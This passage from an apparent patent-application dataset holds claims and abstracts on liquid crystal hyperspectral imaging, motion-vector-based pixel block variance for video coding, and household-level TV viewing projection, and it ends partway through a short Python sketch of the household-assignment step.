obtaining a first hyperspectral image; and using information from the first hyperspectral image to correct the voltage waveform prior to obtaining a next hyperspectral image. 20. The method of claim 18, further comprising storing corrections to the voltage waveform in a memory. 21. The method of claim 18, wherein the pre-computed voltage waveform is a dynamic waveform. 22. The method of claim 18, wherein the pre-computed voltage waveform causes a retardance of the variable retarder to vary linearly over time. 23. The method of claim 18, further comprising sensing the light beam at an image sensor after the light beam passes through the liquid crystal retarder. 24. The method of claim 19, wherein using information to correct the voltage waveform comprises finding an optimal time-varying voltage waveform for each total image acquisition time and each temperature. 25. The method of claim 18, wherein two individual image frames are acquired within a time interval shorter than a response time of the liquid crystal variable retarder. 26. The method of claim 12, wherein sampling the light from the source occurs at a time interval faster than a response time of a liquid crystal variable retarder in the hyperspectral imaging sensor. | A method of operating a hyperspectral imaging device includes connecting electrodes on a liquid crystal variable retarder to a voltage source, rotating liquid crystal material in the liquid crystal variable retarder between a first orientation with a certain optical phase delay and a second orientation with a different optical phase delay, receiving a beam of light at an image sensor that has passed through the liquid crystal variable retarder, and producing an output signal from the image sensor.1. A method of operating a hyperspectral imaging device, comprising:
connecting electrodes on a liquid crystal variable retarder to a voltage source; switching the liquid crystal variable retarder between a first retardance and a second retardance, wherein the switching occurs within a specified time; receiving a beam of light at an image sensor that has passed through the liquid crystal variable retarder; and producing an output signal from the image sensor. 2. (canceled) 3. (canceled) 4. The method of claim 1, wherein switching the liquid crystal variable retarder comprises:
applying a first set of voltages to the liquid crystal variable retarder to switch the liquid crystal variable retarder to the first retardance; and applying a second set of voltages to the liquid crystal variable retarder to switch the liquid crystal variable retarder from the first retardance to the second retardance. 5. The method of claim 1, wherein the optical phase delay between ordinary and extraordinary rays changes monotonically as the liquid crystal is switched between the first retardance and the second retardance. 6. The method of claim 1, wherein switching the liquid crystal variable retarder comprises:
applying a time varying voltage consisting of frequency components at one of above or below the frequency at which the dielectric anisotropy of the liquid crystal changes sign, then applying a time varying voltage consisting of frequency components at the other of above or below the frequency at which the dielectric anisotropy of the liquid crystal changes sign. 7. The method of claim 1, further comprising applying compensation to mitigate beam walk-off. 8. The method of claim 1, further comprising:
comparing at least two output signals representing two corresponding frames of image data sensed by the image sensor; and determining an adjustment to be made to the output signals to improve image registration. 9. The method of claim 1, wherein producing an output from the image sensor comprises:
collecting sensing responses from pixels in regions on the image sensor; summing the sensing responses; and outputting the summed responses from the image sensor. 10. The method of claim 1, further comprising storing calibration data for the hyperspectral image sensor in a memory. 11. The method of claim 10, further comprising:
measuring a temperature; and using the temperature as an index into a calibration table in which is stored the calibration data. 12. A method of calibrating a hyperspectral imaging device, comprising:
illuminating a hyperspectral imaging sensor with a light source having known spectral properties, wherein the illuminating is repeated across a range of temperatures and times; sampling the light from the light source with the hyperspectral imaging sensor to obtain sampled spectral properties for particular ones of the range of temperatures and times; and calibrating a performance characteristic of the hyperspectral imaging sensor based upon comparing the sampled spectral properties of the light source to the known spectral properties. 13. The method of claim 12, wherein calibrating the performance characteristic comprises calibrating a retardance controller with optical retardance versus applied time-varying voltage. 14. The method of claim 12, wherein calibrating the performance characteristic comprises calibrating a retardance controller with performance versus temperature for the range of temperatures. 15. The method of claim 12, wherein illuminating the hyperspectral imaging sensor with a light source comprises illuminating the hyperspectral imaging sensor with a light source having at least one defined spectral peak. 16. The method of claim 15, further comprising determining an adjustment to outputs of the image sensor based on measured differences between the at least one defined spectral peak and at least one detected spectral peak at the image sensor. 17. The method of claim 16, wherein sampling the light comprises sampling the light from selected regions of the image sensor and using the adjustment to determine a response of a liquid crystal variable retarder in the hyperspectral image sensor. 18. A method of operating a hyperspectral imaging device, comprising:
receiving a light beam at a liquid crystal retarding device; and driving the liquid crystal retarding device with a pre-computed voltage waveform, wherein the voltage waveform is selected to reach a target optical retardance over time for the liquid crystal retarding device. 19. The method of claim 18, further comprising:
obtaining a first hyperspectral image; and using information from the first hyperspectral image to correct the voltage waveform prior to obtaining a next hyperspectral image. 20. The method of claim 18, further comprising storing corrections to the voltage waveform in a memory. 21. The method of claim 18, wherein the pre-computed voltage waveform is a dynamic waveform. 22. The method of claim 18, wherein the pre-computed voltage waveform causes a retardance of the variable retarder to vary linearly over time. 23. The method of claim 18, further comprising sensing the light beam at an image sensor after the light beam passes through the liquid crystal retarder. 24. The method of claim 19, wherein using information to correct the voltage waveform comprises finding an optimal time-varying voltage waveform for each total image acquisition time and each temperature. 25. The method of claim 18, wherein two individual image frames are acquired within a time interval shorter than a response time of the liquid crystal variable retarder. 26. The method of claim 12, wherein sampling the light from the source occurs at a time interval faster than a response time of a liquid crystal variable retarder in the hyperspectral imaging sensor. | 2,400 |
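The temperature-indexed calibration lookup recited in claims 10-11 of the hyperspectral-imaging application above (store calibration data in a memory; measure a temperature and use it as an index into a calibration table) can be sketched as follows. This is an illustrative reading only, not the filed implementation; the function name, table layout, temperatures, and waveform samples are all assumptions.

```python
# Hedged sketch of the calibration lookup in claims 10-11 above: calibration
# data is stored in memory and a measured temperature indexes into it.
# Names, temperatures, and waveform samples are illustrative assumptions.

def nearest_calibration(table, measured_temp_c):
    """Return the stored voltage waveform calibrated at the temperature
    closest to the measured one (a simple nearest-neighbour lookup)."""
    best_temp = min(table, key=lambda t: abs(t - measured_temp_c))
    return table[best_temp]

# Hypothetical table: calibration temperature (deg C) -> voltage samples
calib_table = {
    20.0: [0.0, 1.2, 2.5, 3.9],
    30.0: [0.0, 1.1, 2.3, 3.6],
    40.0: [0.0, 1.0, 2.1, 3.3],
}

waveform = nearest_calibration(calib_table, 28.4)  # picks the 30.0 degC entry
```

A production controller would more likely interpolate between neighbouring temperature entries rather than snap to the nearest one; the claims leave that choice open.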
9,195 | 9,195 | 16,377,524 | 2,419 | The present disclosure is directed to techniques for determining variance of a pixel block in a frame of video based on variance of pixel blocks in a reference frame of the video, instead of directly, for example, by calculating variance based on pixel values of the pixel block. The techniques include identifying a motion vector for a pixel block in a current frame, the motion vector pointing to a pixel block in a reference frame. The techniques also include determining the cost associated with the motion vector and comparing the cost to first and second thresholds. The techniques include determining the variance for the pixel block of the current frame based on the comparison of the cost to the first and second threshold and based on the variance of the pixel block of the reference frame. | 1. A method for determining a variance for a pixel block, the method comprising:
identifying a motion vector for the pixel block, the motion vector being associated with a second pixel block of a reference frame; determining a cost for the pixel block, the cost indicating a degree of similarity between the pixel block and the second pixel block; and determining the variance for the pixel block based on the cost. 2. The method of claim 1, wherein determining the variance for the pixel block based on the cost comprises:
determining that the cost is below a first threshold; and responsive to determining that the cost is below the first threshold, determining the variance for the pixel block as a variance of the second pixel block of the reference frame. 3. The method of claim 1, wherein determining the variance for the pixel block based on the cost comprises:
determining that the cost is above a first threshold but below a second threshold; and responsive to determining that the cost is above the first threshold but below the second threshold, determining the variance for the pixel block as a variance of the second pixel block of the reference frame modified by a correlation factor. 4. The method of claim 3, wherein:
the correlation factor is based on a correlation function that is based on video training data. 5. The method of claim 1, wherein determining the variance for the pixel block based on the cost comprises:
determining that the cost is above a first threshold and a second threshold; and responsive to determining that the cost is above both the first threshold and the second threshold, determining the variance for the pixel block directly based on the pixels of the pixel block. 6. The method of claim 1, wherein determining the variance comprises:
determining that costs for a threshold number of blocks in a current frame in which the pixel block exists are above both a first threshold and second threshold; and responsive to determining that the costs for the threshold number of blocks are above the first threshold and the second threshold, directly determining the variance for all pixel blocks of the current frame based on pixel values of each respective pixel block. 7. The method of claim 1, wherein identifying the motion vector for the pixel block comprises:
identifying a set of candidate motion vectors that point to pixel blocks of the reference frame within a search area; determining costs for the pixel blocks of the reference frame within the search area; identifying a cost of the determined costs; and identifying, as the motion vector for the pixel block, the candidate motion vector associated with the identified cost. 8. The method of claim 7, wherein determining the costs for each of the pixel blocks comprises:
applying a mean absolute difference technique or a mean squared error technique on pixels of the pixel blocks. 9. The method of claim 1, wherein the reference frame comprises a frame prior to or after a current frame in which the pixel block exists. 10. A computer system for determining a variance for a pixel block, the computer system comprising:
a processor; and a memory storing instructions for execution by the processor, the instructions causing the processor to:
identify a motion vector for the pixel block, the motion vector being associated with a second pixel block of a reference frame;
determine a cost for the pixel block, the cost indicating a degree of similarity between the pixel block and the second pixel block; and
determine the variance for the pixel block based on the cost. 11. The computer system of claim 10, wherein determining the variance for the pixel block based on the cost comprises:
determining that the cost is below a first threshold; and responsive to determining that the cost is below the first threshold, determining the variance for the pixel block as a variance of the second pixel block of the reference frame. 12. The computer system of claim 10, wherein determining the variance for the pixel block based on the cost comprises:
determining that the cost is above a first threshold but below a second threshold; and responsive to determining that the cost is above the first threshold but below the second threshold, determining the variance for the pixel block as a variance of the second pixel block of the reference frame modified by a correlation factor. 13. The computer system of claim 12, wherein:
the correlation factor is based on a correlation function that is based on video training data. 14. The computer system of claim 10, wherein determining the variance for the pixel block based on the cost comprises:
determining that the cost is above a first threshold and a second threshold; and responsive to determining that the cost is above both the first threshold and the second threshold, determining the variance for the pixel block directly based on the pixels of the pixel block. 15. The computer system of claim 10, wherein determining the variance comprises:
determining that costs for a threshold number of blocks in a current frame in which the pixel block exists are above both a first threshold and second threshold; and responsive to determining that the costs for the threshold number of blocks are above the first threshold and the second threshold, directly determining the variance for all pixel blocks of the current frame based on pixel values of each respective pixel block. 16. The computer system of claim 10, wherein identifying the motion vector for the pixel block comprises:
identifying a set of candidate motion vectors that point to pixel blocks of the reference frame within a search area; determining costs for the pixel blocks of the reference frame within the search area; identifying a cost of the determined costs; and identifying, as the motion vector for the pixel block, the candidate motion vector associated with the identified cost. 17. The computer system of claim 16, wherein determining the costs for each of the pixel blocks comprises:
applying a mean absolute difference technique or a mean squared error technique on pixels of the pixel blocks. 18. The computer system of claim 10, wherein the reference frame comprises a frame prior to or after a current frame in which the pixel block exists. 19. A non-transitory computer-readable medium storing instructions that, when executed by a processor, cause the processor to execute a method for determining a variance for a pixel block, the method comprising:
identifying a motion vector for the pixel block, the motion vector being associated with a second pixel block of a reference frame; determining a cost for the pixel block, the cost indicating a degree of similarity between the pixel block and the second pixel block; and determining the variance for the pixel block based on the cost. 20. The non-transitory computer-readable medium of claim 19, wherein determining the variance for the pixel block based on the cost comprises:
determining that the cost is below a first threshold; and responsive to determining that the cost is below the first threshold, determining the variance for the pixel block as a variance of the second pixel block of the reference frame. | The present disclosure is directed to techniques for determining variance of a pixel block in a frame of video based on variance of pixel blocks in a reference frame of the video, instead of directly, for example, by calculating variance based on pixel values of the pixel block. The techniques include identifying a motion vector for a pixel block in a current frame, the motion vector pointing to a pixel block in a reference frame. The techniques also include determining the cost associated with the motion vector and comparing the cost to first and second thresholds. The techniques include determining the variance for the pixel block of the current frame based on the comparison of the cost to the first and second threshold and based on the variance of the pixel block of the reference frame.1. A method for determining a variance for a pixel block, the method comprising:
identifying a motion vector for the pixel block, the motion vector being associated with a second pixel block of a reference frame; determining a cost for the pixel block, the cost indicating a degree of similarity between the pixel block and the second pixel block; and determining the variance for the pixel block based on the cost. 2. The method of claim 1, wherein determining the variance for the pixel block based on the cost comprises:
determining that the cost is below a first threshold; and responsive to determining that the cost is below the first threshold, determining the variance for the pixel block as a variance of the second pixel block of the reference frame. 3. The method of claim 1, wherein determining the variance for the pixel block based on the cost comprises:
determining that the cost is above a first threshold but below a second threshold; and responsive to determining that the cost is above the first threshold but below the second threshold, determining the variance for the pixel block as a variance of the second pixel block of the reference frame modified by a correlation factor. 4. The method of claim 3, wherein:
the correlation factor is based on a correlation function that is based on video training data. 5. The method of claim 1, wherein determining the variance for the pixel block based on the cost comprises:
determining that the cost is above a first threshold and a second threshold; and responsive to determining that the cost is above both the first threshold and the second threshold, determining the variance for the pixel block directly based on the pixels of the pixel block. 6. The method of claim 1, wherein determining the variance comprises:
determining that costs for a threshold number of blocks in a current frame in which the pixel block exists are above both a first threshold and second threshold; and responsive to determining that the costs for the threshold number of blocks are above the first threshold and the second threshold, directly determining the variance for all pixel blocks of the current frame based on pixel values of each respective pixel block. 7. The method of claim 1, wherein identifying the motion vector for the pixel block comprises:
identifying a set of candidate motion vectors that point to pixel blocks of the reference frame within a search area; determining costs for the pixel blocks of the reference frame within the search area; identifying a cost of the determined costs; and identifying, as the motion vector for the pixel block, the candidate motion vector associated with the identified cost. 8. The method of claim 7, wherein determining the costs for each of the pixel blocks comprises:
applying a mean absolute difference technique or a mean squared error technique on pixels of the pixel blocks. 9. The method of claim 1, wherein the reference frame comprises a frame prior to or after a current frame in which the pixel block exists. 10. A computer system for determining a variance for a pixel block, the computer system comprising:
a processor; and a memory storing instructions for execution by the processor, the instructions causing the processor to:
identify a motion vector for the pixel block, the motion vector being associated with a second pixel block of a reference frame;
determine a cost for the pixel block, the cost indicating a degree of similarity between the pixel block and the second pixel block; and
determine the variance for the pixel block based on the cost. 11. The computer system of claim 10, wherein determining the variance for the pixel block based on the cost comprises:
determining that the cost is below a first threshold; and responsive to determining that the cost is below the first threshold, determining the variance for the pixel block as a variance of the second pixel block of the reference frame. 12. The computer system of claim 10, wherein determining the variance for the pixel block based on the cost comprises:
determining that the cost is above a first threshold but below a second threshold; and responsive to determining that the cost is above the first threshold but below the second threshold, determining the variance for the pixel block as a variance of the second pixel block of the reference frame modified by a correlation factor. 13. The computer system of claim 12, wherein:
the correlation factor is based on a correlation function that is based on video training data. 14. The computer system of claim 10, wherein determining the variance for the pixel block based on the cost comprises:
determining that the cost is above a first threshold and a second threshold; and responsive to determining that the cost is above both the first threshold and the second threshold, determining the variance for the pixel block directly based on the pixels of the pixel block. 15. The computer system of claim 10, wherein determining the variance comprises:
determining that costs for a threshold number of blocks in a current frame in which the pixel block exists are above both a first threshold and second threshold; and responsive to determining that the costs for the threshold number of blocks are above the first threshold and the second threshold, directly determining the variance for all pixel blocks of the current frame based on pixel values of each respective pixel block. 16. The computer system of claim 10, wherein identifying the motion vector for the pixel block comprises:
identifying a set of candidate motion vectors that point to pixel blocks of the reference frame within a search area; determining costs for the pixel blocks of the reference frame within the search area; identifying a cost of the determined costs; and identifying, as the motion vector for the pixel block, the candidate motion vector associated with the identified cost. 17. The computer system of claim 16, wherein determining the costs for each of the pixel blocks comprises:
applying a mean absolute difference technique or a mean squared error technique on pixels of the pixel blocks. 18. The computer system of claim 10, wherein the reference frame comprises a frame prior to or after a current frame in which the pixel block exists. 19. A non-transitory computer-readable medium storing instructions that, when executed by a processor, cause the processor to execute a method for determining a variance for a pixel block, the method comprising:
identifying a motion vector for the pixel block, the motion vector being associated with a second pixel block of a reference frame; determining a cost for the pixel block, the cost indicating a degree of similarity between the pixel block and the second pixel block; and determining the variance for the pixel block based on the cost. 20. The non-transitory computer-readable medium of claim 19, wherein determining the variance for the pixel block based on the cost comprises:
determining that the cost is below a first threshold; and responsive to determining that the cost is below the first threshold, determining the variance for the pixel block as a variance of the second pixel block of the reference frame. | 2,400 |
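The two-threshold variance decision recited in claims 1-5 of application 16,377,524 above can be sketched as follows — a minimal illustration, not the filed implementation. The threshold values `t1` and `t2`, the correlation factor, and the flat pixel lists are assumptions; claim 8's cost is taken here as a mean absolute difference.

```python
# Hedged sketch of claims 1-5: reuse the reference block's variance when the
# motion-compensation cost is low, scale it by a correlation factor at
# moderate cost, and fall back to a direct computation at high cost.
# Thresholds and the correlation factor are illustrative assumptions.

def mad_cost(block, ref_block):
    """Mean absolute difference between co-located pixels (one reading of
    the cost in claim 8)."""
    return sum(abs(a - b) for a, b in zip(block, ref_block)) / len(block)

def direct_variance(block):
    """Variance computed directly from the block's own pixel values."""
    mean = sum(block) / len(block)
    return sum((p - mean) ** 2 for p in block) / len(block)

def block_variance(block, ref_block, ref_variance, t1=4.0, t2=16.0, corr=0.9):
    cost = mad_cost(block, ref_block)
    if cost < t1:                  # claim 2: reuse the reference variance
        return ref_variance
    if cost < t2:                  # claim 3: scale by a correlation factor
        return ref_variance * corr
    return direct_variance(block)  # claim 5: compute directly from pixels
```

A real encoder would operate on 2-D pixel blocks and tune `t1`/`t2` empirically (claim 4 suggests deriving the correlation factor from video training data); flat lists keep the sketch self-contained.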
9,196 | 9,196 | 16,035,527 | 2,421 | Techniques for projecting household-level viewing events are described herein. Population data may be accessed including classes of a plurality of demographic attributes for households in a market. Representative household units (RHUs) may be generated, and the RHUs may be assigned a class for each of the demographic attributes and a quota based on the demographic attributes of a plurality of panelist households. Each of the panelist households may be assigned to one of the RHUs based on at least one panelist class matching the classes for respective demographic attributes of the RHU, and the number of matching panelist households assigned to each of the RHUs may be based on the quota. Panelist viewing data representing viewing events associated with the panelist household may be accessed. A report may be generated with the classes of the RHUs and the panelist viewing data of the assigned panelist households. | 1. A system, comprising:
at least one processor; and at least one memory storing instructions that, when executed, cause the at least one processor to:
access population data including classes for each of first and second demographic attributes of households in a market;
generate an array of representative household units (RHUs) including a first RHU, wherein the RHUs are each assigned a class for each of the first and second demographic attributes;
access a panelist class of each of the first and second demographic attributes for first and second panelist households;
match the panelist classes of the first and second demographic attributes for the first panelist household to the respective classes of the first and second demographic attributes for a first RHU;
assign the first panelist household to the first RHU;
determine that the panelist classes of the first and second demographic attributes for the second panelist household do not match the respective classes of the first and second demographic attributes for any RHU;
match the panelist class of the first demographic attribute for the second panelist household to the class of the first demographic attribute for the first RHU;
assign the second panelist household to the first RHU;
access panelist viewing data representing viewing events associated with the first and second panelist households; and
generate a report including the classes of the first RHU and the panelist viewing data of the first and second panelist households. 2. The system of claim 1, wherein the first demographic attribute includes one or more of an income of the household, a language spoken in the household, a number of members of the household, and a number of children of the household. 3. The system of claim 1, wherein the second demographic attribute includes one or more of an age of at least one member of the household, a gender of at least one member of the household, a race of at least one member of the household, an ethnicity of at least one member of the household, and an education level of at least one member of the household. 4. The system of claim 1, wherein the population data includes classes for a third demographic attribute of the households in the market, the RHUs are each assigned a class for the third demographic attribute, a panelist class of each of the first, second, and third demographic attributes are accessed for a third panelist household, and the instructions, when executed, further cause the at least one processor to:
determine that the panelist classes of the first, second, and third demographic attributes for the third panelist household do not match the respective classes of the first, second, and third demographic attributes for any RHU; determine that the panelist classes of the first and second demographic attributes for the third panelist household do not match the respective classes of the first, second, and third demographic attributes for any RHU; match the panelist class of the first demographic attribute for the third panelist household to the class of the first RHU for the first demographic attribute; and assign the third panelist household to the first RHU. 5. The system of claim 4, wherein the third demographic attribute includes a number of television sets. 6. The system of claim 1, wherein each viewing event in the panelist viewing data includes an identification of a media, an advertisement, a website, an app, a network, and/or a program associated with the viewing event and a time duration that the panelist household was exposed to the viewing event. 7. The system of claim 1, wherein the viewing event occurs on one or more of a television, a mobile phone, a tablet, and a smart watch. 8. The system of claim 1, wherein the instructions, when executed, further cause the at least one processor to generate a quota based on the number of households with the demographic attributes of the RHU relative to the number of households in the market, wherein the number of matching panelist households assigned to each RHU is based on the quota. 9. The system of claim 8, wherein the instructions, when executed, further cause the at least one processor to stop assigning panelist households to an RHU based on the number of matching panelist households meeting the quota of the RHU. 10. 
The system of claim 9, wherein the instructions, when executed, further cause the at least one processor to duplicate the viewing data of the at least one first panelist households for an RHU based on the number of matching panelist households assigned to the RHU being less than the quota after the plurality of panelist households are assigned. 11. The system of claim 1, wherein the instructions, when executed, further cause the at least one processor to determine that the panelist households are active based on viewing data accessed from a predetermined period of time, wherein only active panelist households are assigned to the RHUs. 12. The system of claim 1, wherein the population data is received from one or more of a credit bureau and a census bureau. 13. A computer-implemented process, comprising:
accessing population data including classes for each of first and second demographic attributes of households in a market; generating an array of representative household units (RHUs) including a first RHU, wherein the RHUs are each assigned a class for each of the first and second demographic attributes; accessing a panelist class of each of the first and second demographic attributes for first and second panelist households; matching the panelist classes of the first and second demographic attributes for the first panelist household to the respective classes of the first and second demographic attributes for a first RHU; assigning the first panelist household to the first RHU; determining that the panelist classes of the first and second demographic attributes for the second panelist household do not match the respective classes of the first and second demographic attributes for any RHU; matching the panelist class of the first demographic attribute for the second panelist household to the class of the first demographic attribute for the first RHU; assigning the second panelist household to the first RHU; accessing panelist viewing data representing viewing events associated with the first and second panelist households; and generating a report including the classes of the first RHU and the panelist viewing data of the first and second panelist households. 14. The computer-implemented process of claim 13, wherein the first demographic attribute includes one or more of an income of the household, a language spoken in the household, a number of members of the household, and a number of children of the household. 15. 
The computer-implemented process of claim 13, wherein the second demographic attribute includes one or more of an age of at least one member of the household, a gender of at least one member of the household, a race of at least one member of the household, an ethnicity of at least one member of the household, and an education level of at least one member of the household. 16. The computer-implemented process of claim 13, wherein the population data includes classes for a third demographic attribute of the households in the market, the RHUs are each assigned a class for the third demographic attribute, a panelist class of each of the first, second, and third demographic attributes are accessed for a third panelist household, and the process further includes:
determining that the panelist classes of the first, second, and third demographic attributes for the third panelist household do not match the respective classes of the first, second, and third demographic attributes for any RHU; determining that the panelist classes of the first and second demographic attributes for the third panelist household do not match the respective classes of the first, second, and third demographic attributes for any RHU; matching the panelist class of the first demographic attribute for the third panelist household to the class of the first RHU for the first demographic attribute; and assigning the third panelist household to the first RHU. 17. A computer-readable medium comprising computer-executable instructions which, when executed by at least one processor, cause the at least one processor to:
access population data including classes for each of first and second demographic attributes of households in a market; generate an array of representative household units (RHUs) including a first RHU, wherein the RHUs are each assigned a class for each of the first and second demographic attributes; access a panelist class of each of the first and second demographic attributes for first and second panelist households; match the panelist classes of the first and second demographic attributes for the first panelist household to the respective classes of the first and second demographic attributes for a first RHU; assign the first panelist household to the first RHU; determine that the panelist classes of the first and second demographic attributes for the second panelist household do not match the respective classes of the first and second demographic attributes for any RHU; match the panelist class of the first demographic attribute for the second panelist household to the class of the first demographic attribute for the first RHU; assign the second panelist household to the first RHU; access panelist viewing data representing viewing events associated with the first and second panelist households; and generate a report including the classes of the first RHU and the panelist viewing data of the first and second panelist households. 18. The computer-readable medium of claim 17, wherein the first demographic attribute includes one or more of an income of the household, a language spoken in the household, a number of members of the household, and a number of children of the household. 19. The computer-readable medium of claim 17, wherein the second demographic attribute includes one or more of an age of at least one member of the household, a gender of at least one member of the household, a race of at least one member of the household, an ethnicity of at least one member of the household, and an education level of at least one member of the household. 20. 
The computer-readable medium of claim 17, wherein the population data includes classes for a third demographic attribute of the households in the market, the RHUs are each assigned a class for the third demographic attribute, a panelist class of each of the first, second, and third demographic attributes are accessed for a third panelist household, and the instructions, when executed, further cause the at least one processor to:
determine that the panelist classes of the first, second, and third demographic attributes for the third panelist household do not match the respective classes of the first, second, and third demographic attributes for any RHU; determine that the panelist classes of the first and second demographic attributes for the third panelist household do not match the respective classes of the first, second, and third demographic attributes for any RHU; match the panelist class of the first demographic attribute for the third panelist household to the class of the first RHU for the first demographic attribute; and assign the third panelist household to the first RHU. | Techniques for projecting household-level viewing events are described herein. Population data may be accessed including classes of a plurality of demographic attributes for households in a market. Representative household units (RHUs) may be generated, and the RHUs may be assigned a class for each of the demographic attributes and a quota based on the demographic attributes of a plurality of panelist households. Each of the panelist households may be assigned to one of the RHUs based on at least one panelist class matching the classes for respective demographic attributes of the RHU, and the number of matching panelist households assigned to each of the RHUs may be based on the quota. Panelist viewing data representing viewing events associated with the panelist household may be accessed. A report may be generated with the classes of the RHUs and the panelist viewing data of the assigned panelist households.1. A system, comprising:
at least one processor; and at least one memory storing instructions that, when executed, cause the at least one processor to:
access population data including classes for each of first and second demographic attributes of households in a market;
generate an array of representative household units (RHUs) including a first RHU, wherein the RHUs are each assigned a class for each of the first and second demographic attributes;
access a panelist class of each of the first and second demographic attributes for first and second panelist households;
match the panelist classes of the first and second demographic attributes for the first panelist household to the respective classes of the first and second demographic attributes for a first RHU;
assign the first panelist household to the first RHU;
determine that the panelist classes of the first and second demographic attributes for the second panelist household do not match the respective classes of the first and second demographic attributes for any RHU;
match the panelist class of the first demographic attribute for the second panelist household to the class of the first demographic attribute for the first RHU;
assign the second panelist household to the first RHU;
access panelist viewing data representing viewing events associated with the first and second panelist households; and
generate a report including the classes of the first RHU and the panelist viewing data of the first and second panelist households. 2. The system of claim 1, wherein the first demographic attribute includes one or more of an income of the household, a language spoken in the household, a number of members of the household, and a number of children of the household. 3. The system of claim 1, wherein the second demographic attribute includes one or more of an age of at least one member of the household, a gender of at least one member of the household, a race of at least one member of the household, an ethnicity of at least one member of the household, and an education level of at least one member of the household. 4. The system of claim 1, wherein the population data includes classes for a third demographic attribute of the households in the market, the RHUs are each assigned a class for the third demographic attribute, a panelist class of each of the first, second, and third demographic attributes is accessed for a third panelist household, and the instructions, when executed, further cause the at least one processor to:
determine that the panelist classes of the first, second, and third demographic attributes for the third panelist household do not match the respective classes of the first, second, and third demographic attributes for any RHU; determine that the panelist classes of the first and second demographic attributes for the third panelist household do not match the respective classes of the first and second demographic attributes for any RHU; match the panelist class of the first demographic attribute for the third panelist household to the class of the first RHU for the first demographic attribute; and assign the third panelist household to the first RHU. 5. The system of claim 4, wherein the third demographic attribute includes a number of television sets. 6. The system of claim 1, wherein each viewing event in the panelist viewing data includes an identification of a media, an advertisement, a website, an app, a network, and/or a program associated with the viewing event and a time duration that the panelist household was exposed to the viewing event. 7. The system of claim 1, wherein the viewing event occurs on one or more of a television, a mobile phone, a tablet, and a smart watch. 8. The system of claim 1, wherein the instructions, when executed, further cause the at least one processor to generate a quota based on the number of households with the demographic attributes of the RHU relative to the number of households in the market, wherein the number of matching panelist households assigned to each RHU is based on the quota. 9. The system of claim 8, wherein the instructions, when executed, further cause the at least one processor to stop assigning panelist households to an RHU based on the number of matching panelist households meeting the quota of the RHU. 10. 
The system of claim 9, wherein the instructions, when executed, further cause the at least one processor to duplicate the viewing data of at least one of the panelist households assigned to an RHU based on the number of matching panelist households assigned to the RHU being less than the quota after the plurality of panelist households are assigned. 11. The system of claim 1, wherein the instructions, when executed, further cause the at least one processor to determine that the panelist households are active based on viewing data accessed from a predetermined period of time, wherein only active panelist households are assigned to the RHUs. 12. The system of claim 1, wherein the population data is received from one or more of a credit bureau and a census bureau. 13. A computer-implemented process, comprising:
accessing population data including classes for each of first and second demographic attributes of households in a market; generating an array of representative household units (RHUs) including a first RHU, wherein the RHUs are each assigned a class for each of the first and second demographic attributes; accessing a panelist class of each of the first and second demographic attributes for first and second panelist households; matching the panelist classes of the first and second demographic attributes for the first panelist household to the respective classes of the first and second demographic attributes for a first RHU; assigning the first panelist household to the first RHU; determining that the panelist classes of the first and second demographic attributes for the second panelist household do not match the respective classes of the first and second demographic attributes for any RHU; matching the panelist class of the first demographic attribute for the second panelist household to the class of the first demographic attribute for the first RHU; assigning the second panelist household to the first RHU; accessing panelist viewing data representing viewing events associated with the first and second panelist households; and generating a report including the classes of the first RHU and the panelist viewing data of the first and second panelist households. 14. The computer-implemented process of claim 13, wherein the first demographic attribute includes one or more of an income of the household, a language spoken in the household, a number of members of the household, and a number of children of the household. 15. 
The computer-implemented process of claim 13, wherein the second demographic attribute includes one or more of an age of at least one member of the household, a gender of at least one member of the household, a race of at least one member of the household, an ethnicity of at least one member of the household, and an education level of at least one member of the household. 16. The computer-implemented process of claim 13, wherein the population data includes classes for a third demographic attribute of the households in the market, the RHUs are each assigned a class for the third demographic attribute, a panelist class of each of the first, second, and third demographic attributes is accessed for a third panelist household, and the process further includes:
determining that the panelist classes of the first, second, and third demographic attributes for the third panelist household do not match the respective classes of the first, second, and third demographic attributes for any RHU; determining that the panelist classes of the first and second demographic attributes for the third panelist household do not match the respective classes of the first and second demographic attributes for any RHU; matching the panelist class of the first demographic attribute for the third panelist household to the class of the first RHU for the first demographic attribute; and assigning the third panelist household to the first RHU. 17. A computer-readable medium comprising computer-executable instructions which, when executed by at least one processor, cause the at least one processor to:
access population data including classes for each of first and second demographic attributes of households in a market; generate an array of representative household units (RHUs) including a first RHU, wherein the RHUs are each assigned a class for each of the first and second demographic attributes; access a panelist class of each of the first and second demographic attributes for first and second panelist households; match the panelist classes of the first and second demographic attributes for the first panelist household to the respective classes of the first and second demographic attributes for a first RHU; assign the first panelist household to the first RHU; determine that the panelist classes of the first and second demographic attributes for the second panelist household do not match the respective classes of the first and second demographic attributes for any RHU; match the panelist class of the first demographic attribute for the second panelist household to the class of the first demographic attribute for the first RHU; assign the second panelist household to the first RHU; access panelist viewing data representing viewing events associated with the first and second panelist households; and generate a report including the classes of the first RHU and the panelist viewing data of the first and second panelist households. 18. The computer-readable medium of claim 17, wherein the first demographic attribute includes one or more of an income of the household, a language spoken in the household, a number of members of the household, and a number of children of the household. 19. The computer-readable medium of claim 17, wherein the second demographic attribute includes one or more of an age of at least one member of the household, a gender of at least one member of the household, a race of at least one member of the household, an ethnicity of at least one member of the household, and an education level of at least one member of the household. 20. 
The computer-readable medium of claim 17, wherein the population data includes classes for a third demographic attribute of the households in the market, the RHUs are each assigned a class for the third demographic attribute, a panelist class of each of the first, second, and third demographic attributes is accessed for a third panelist household, and the instructions, when executed, further cause the at least one processor to:
determine that the panelist classes of the first, second, and third demographic attributes for the third panelist household do not match the respective classes of the first, second, and third demographic attributes for any RHU; determine that the panelist classes of the first and second demographic attributes for the third panelist household do not match the respective classes of the first and second demographic attributes for any RHU; match the panelist class of the first demographic attribute for the third panelist household to the class of the first RHU for the first demographic attribute; and assign the third panelist household to the first RHU. | 2,400 |
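The assignment procedure recited in the claims above (try an exact match on both demographic attributes first, then fall back to matching only the first attribute, with the number of households per RHU capped by a quota) can be sketched as follows. This is a minimal illustration in Python; the record layout, field names, and single-fallback quota handling are assumptions for the example, not taken from the application.

```python
# Hypothetical sketch of the two-stage RHU assignment in the claims:
# stage 1 matches both demographic attributes, stage 2 falls back to
# matching only the first attribute; both stages respect the RHU quota.

def assign_households(rhus, panelists):
    """Assign each panelist household to a representative household unit."""
    assignments = {rhu["id"]: [] for rhu in rhus}
    for hh in panelists:
        # Stage 1: exact match on both attributes, if quota not yet met.
        target = next(
            (r for r in rhus
             if r["attr1"] == hh["attr1"] and r["attr2"] == hh["attr2"]
             and len(assignments[r["id"]]) < r["quota"]),
            None,
        )
        # Stage 2: no full match anywhere, so match the first attribute only.
        if target is None:
            target = next(
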